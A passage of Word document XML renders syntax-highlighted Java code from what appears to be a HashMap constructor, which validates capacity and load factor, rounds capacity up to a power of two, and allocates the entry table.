          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> IllegalArgumentException(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"Illegal initial capacity: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> +  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>                                           initialCapacity);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (initialCapacity &gt; MAXIMUM_CAPACITY)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        initialCapacity = MAXIMUM_CAPACITY;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (loadFactor &lt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> || Float.isNaN(loadFactor))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> IllegalArgumentException(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"Illegal load factor: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> +  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>                                           loadFactor);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>// Find a power of 2 &gt;= initialCapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> capacity = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (capacity &lt; initialCapacity)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        capacity &lt;&lt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.loadFactor = loadFactor;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    threshold = (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)(capacity * loadFactor);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    table = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> Entry[capacity];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
